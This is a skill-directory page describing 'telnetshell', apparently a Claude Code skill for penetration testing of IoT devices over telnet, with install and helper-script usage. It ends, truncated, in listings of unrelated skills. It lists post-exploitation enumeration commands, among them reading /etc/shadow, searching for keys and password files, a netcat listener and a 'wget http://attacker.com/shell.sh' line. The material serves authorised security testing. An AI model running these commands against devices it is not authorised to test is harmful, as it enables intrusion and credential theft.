telnetshell
Use telnet to interact with IoT device shells for pentesting operations including device enumeration, vulnerability discovery, credential testing, and post-exploitation. Use when the user needs to interact with network-accessible shells, IoT devices, or telnet services.
Install
mkdir -p .claude/skills/telnetshell && curl -L -o skill.zip "https://mcp.directory/api/skills/download/3901" && unzip -o skill.zip -d .claude/skills/telnetshell && rm skill.zipInstalls to .claude/skills/telnetshell
About this skill
IoT Telnet Shell (telnetshell)
This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities.
Prerequisites
- Python 3 with pexpect library (
pip install pexpectorsudo pacman -S python-pexpect) - telnet client installed on the system (
sudo pacman -S inetutilson Arch) - Network access to the target device's telnet port
Recommended Approach: Telnet Helper Script
IMPORTANT: This skill includes a Python helper script (telnet_helper.py) that provides a clean, reliable interface for telnet communication. This is the RECOMMENDED method for interacting with IoT devices.
Default Session Logging
ALL commands run by Claude will be logged to /tmp/telnet_session.log by default.
To observe what Claude is doing in real-time:
# In a separate terminal, run:
tail -f /tmp/telnet_session.log
This allows you to watch all telnet I/O as it happens without interfering with the connection.
Why Use the Telnet Helper?
The helper script solves many problems with direct telnet usage:
- Clean output: Automatically removes command echoes, prompts, and ANSI codes
- Prompt detection: Automatically detects and waits for device prompts
- Timeout handling: Proper timeout management with no arbitrary sleeps
- Easy scripting: Simple command-line interface for single commands or batch operations
- Session logging: All I/O logged to
/tmp/telnet_session.logfor observation - Reliable: No issues with TTY requirements or background processes
- JSON output: For programmatic parsing and tool chaining
Quick Start with Telnet Helper
Single Command:
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a"
Custom Port:
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command "ls /"
With Custom Prompt (recommended for known devices):
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --prompt "^/ [#\$]" --command "ifconfig"
Interactive Mode:
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive
Batch Commands from File:
# Create a file with commands (one per line)
echo -e "uname -a\ncat /proc/version\nifconfig\nps" > commands.txt
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --script commands.txt
JSON Output (for parsing):
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a" --json
Debug Mode:
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "ls" --debug
Session Logging (for observation):
# Terminal 1 - Run with logging
python3 .claude/skills/telnetshell/telnet_helper.py \
--host 192.168.1.100 \
--port 2222 \
--logfile /tmp/session.log \
--interactive
# Terminal 2 - Watch the session in real-time
tail -f /tmp/session.log
Note: See OBSERVING_SESSIONS.md for comprehensive guide on monitoring telnet sessions.
Telnet Helper Options
Required (one of):
--command, -c CMD Execute single command
--interactive, -i Enter interactive mode
--script, -s FILE Execute commands from file
Connection Options:
--host, -H HOST Target host IP or hostname (required)
--port, -P PORT Telnet port (default: 23)
--timeout, -t SECONDS Command timeout (default: 3.0)
--prompt, -p PATTERN Custom prompt regex pattern
Output Options:
--raw, -r Don't clean output (show echoes, prompts)
--json, -j Output in JSON format
--logfile, -l FILE Log all I/O to file (default: /tmp/telnet_session.log)
--debug Show debug information
Common Prompt Patterns
The helper script includes common prompt patterns, but you can specify custom ones:
# BusyBox shell (common on IoT)
--prompt "/\s*[#\$]\s*$"
# Standard root/user prompts
--prompt "^[#\$]\s*$"
# Custom device
--prompt "^MyDevice>\s*$"
# Uniview cameras
--prompt "^User@[^>]+>\s*$"
Device Enumeration Example with Telnet Helper
Here's a complete example of safely enumerating a device:
# Set variables for convenience
HELPER="python3 .claude/skills/telnetshell/telnet_helper.py"
HOST="192.168.1.100"
PORT="2222"
LOGFILE="/tmp/telnet_session.log"
# System information
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "uname -a"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /proc/version"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /proc/cpuinfo"
# Check for BusyBox
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "busybox"
# Network configuration
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "ifconfig"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "route -n"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "netstat -tulpn"
# Process listing (may need longer timeout)
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --timeout 5 --command "ps aux"
# File system exploration
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "ls -la /"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "mount"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "df -h"
# Security assessment
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /etc/passwd"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "find / -perm -4000 2>/dev/null"
IMPORTANT FOR CLAUDE CODE: When using this skill, ALWAYS include --logfile /tmp/telnet_session.log in every command so the user can monitor activity with tail -f /tmp/telnet_session.log.
Instructions
1. Connection Setup
Default connection:
- Port: 23 (standard telnet, override with
--port) - Timeout: 3 seconds (override with
--timeout) - Logging:
/tmp/telnet_session.logby default
Common telnet ports on IoT devices:
- 23: Standard telnet port
- 2222: Alternative telnet port (common on cameras)
- 8023: Alternative telnet port
- Custom ports: Check device documentation or nmap scan results
2. BusyBox Shells (Most IoT Devices)
IMPORTANT: The vast majority of IoT devices use BusyBox, a lightweight suite of Unix utilities designed for embedded systems. BusyBox provides a minimal shell environment with limited command functionality.
Identifying BusyBox:
# Check what shell you're using
busybox
busybox --help
# Or check symlinks
ls -la /bin/sh
# Often shows: /bin/sh -> /bin/busybox
# List available BusyBox applets
busybox --list
BusyBox Limitations:
- Many standard Linux commands may be simplified versions
- Some common flags/options may not be available
- Features like tab completion may be limited or absent
- Some exploitation techniques that work on full Linux may not work
Common BusyBox commands available:
# Core utilities (usually available)
cat, ls, cd, pwd, echo, cp, mv, rm, mkdir, chmod, chown
ps, kill, top, free, df, mount, umount
grep, find, sed, awk (limited versions)
ifconfig, route, ping, netstat, telnet
vi (basic text editor - no syntax highlighting)
# Check what's available
busybox --list | sort
ls /bin /sbin /usr/bin /usr/sbin
BusyBox-specific considerations for pentesting:
psoutput format may differ from standard Linux- Some privilege escalation techniques require commands not in BusyBox
- File permissions still work the same (SUID, sticky bits, etc.)
- Networking tools are often present (telnet, wget, nc/netcat, ftpget)
- Python/Perl/Ruby are usually NOT available (device storage constraints)
Useful BusyBox commands for enumeration:
# Check BusyBox version (may have known vulnerabilities)
busybox | head -1
# Network utilities often available
nc -l -p 4444 # Netcat listener
wget http://attacker.com/shell.sh
ftpget server file
telnet 192.168.1.1
# httpd (web server) often included
busybox httpd -p 8080 -h /tmp # Quick file sharing
3. Device Enumeration
Once you have shell access, gather the following information:
System Information:
# Kernel and system info
uname -a
cat /proc/version
cat /proc/cpuinfo
cat /proc/meminfo
# Distribution/firmware info
cat /etc/issue
cat /etc/*release*
cat /etc/*version*
# Hostname and network
hostname
cat /etc/hostname
ifconfig -a
cat /etc/network/interfaces
cat /etc/resolv.conf
# Mounted filesystems
mount
cat /proc/mounts
df -h
# Running processes
ps aux
ps -ef
top -b -n 1
User and Permission Information:
# Current user context
id
whoami
groups
# User accounts
cat /etc/passwd
cat /etc/shadow # If readable - major security issue!
cat /etc/group
# Sudo/privilege info
sudo -l
cat /etc/sudoers
Network Services:
# Listening services
netstat -tulpn
lsof -i
# Firewall rules
iptables -L -n -v
cat /etc/iptables/*
Interesting Files and Directories:
# Configuration files
ls -la /etc/
find /etc/ -type f -readable
# Web server configs
ls -la /etc/nginx/
ls -la /etc/apache2/
ls -la /var/www/
# Credentials and keys
find / -name "*.pem" 2>/dev/null
find / -name "*.key" 2>/dev/null
find / -name "*password*" 2>/dev/null
find / -name "*credential*" 2>/dev/null
grep -r "password" /etc/ 2>/dev/null
# SUID/SGID binaries (privilege escalation vectors)
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
# World-writable files/directories
find / -perm -2 -type f 2>/dev/null
find / -perm -2 -type d 2>/dev/null
# Development/debugging tools
which gdb gcc python perl ruby tcpdump
ls /usr/bin/ /bin/ /sbin/ /usr/sbin/
4. Privilege
Content truncated.
More by BrownFineSecurity
View all skills by BrownFineSecurity →You might also like
flutter-development
aj-geddes
Build beautiful cross-platform mobile apps with Flutter and Dart. Covers widgets, state management with Provider/BLoC, navigation, API integration, and material design.
ui-ux-pro-max
nextlevelbuilder
"UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient."
drawio-diagrams-enhanced
jgtolentino
Create professional draw.io (diagrams.net) diagrams in XML format (.drawio files) with integrated PMP/PMBOK methodologies, extensive visual asset libraries, and industry-standard professional templates. Use this skill when users ask to create flowcharts, swimlane diagrams, cross-functional flowcharts, org charts, network diagrams, UML diagrams, BPMN, project management diagrams (WBS, Gantt, PERT, RACI), risk matrices, stakeholder maps, or any other visual diagram in draw.io format. This skill includes access to custom shape libraries for icons, clipart, and professional symbols.
godot
bfollington
This skill should be used when working on Godot Engine projects. It provides specialized knowledge of Godot's file formats (.gd, .tscn, .tres), architecture patterns (component-based, signal-driven, resource-based), common pitfalls, validation tools, code templates, and CLI workflows. The `godot` command is available for running the game, validating scripts, importing resources, and exporting builds. Use this skill for tasks involving Godot game development, debugging scene/resource files, implementing game systems, or creating new Godot components.
nano-banana-pro
garg-aayush
Generate and edit images using Google's Nano Banana Pro (Gemini 3 Pro Image) API. Use when the user asks to generate, create, edit, modify, change, alter, or update images. Also use when user references an existing image file and asks to modify it in any way (e.g., "modify this image", "change the background", "replace X with Y"). Supports both text-to-image generation and image-to-image editing with configurable resolution (1K default, 2K, or 4K for high resolution). DO NOT read the image file first - use this skill directly with the --input-image parameter.
pdf-to-markdown
aliceisjustplaying
Convert entire PDF documents to clean, structured Markdown for full context loading. Use this skill when the user wants to extract ALL text from a PDF into context (not grep/search), when discussing or analyzing PDF content in full, when the user mentions "load the whole PDF", "bring the PDF into context", "read the entire PDF", or when partial extraction/grepping would miss important context. This is the preferred method for PDF text extraction over page-by-page or grep approaches.
Related MCP Servers
Browse all servers
Mobile NextMobile Next offers fast, seamless mobile automation for iOS and Android. Automate apps, extract data, and simplify mobil
iOS SimulatorUse iOS Simulator for testing with tools like UI interaction and device info retrieval. Perfect as an iPhone emulator fo
Android MCPAndroid MCP — lightweight bridge enabling AI agents for Android to perform Android automation and Android UI testing: ap
SerialConnect real-world devices like Raspberry Pi using asynchronous serial interface and comms port for advanced IoT and rob
Android Debug BridgeIntegrate with Android devices via ADB for effective android device management, app control, and automated testing workf
Serial Hardware BridgeSerial Hardware Bridge connects LLMs with real devices via serial communication for powerful IoT and hardware control ap
Stay ahead of the MCP ecosystem
Get weekly updates on new skills and servers.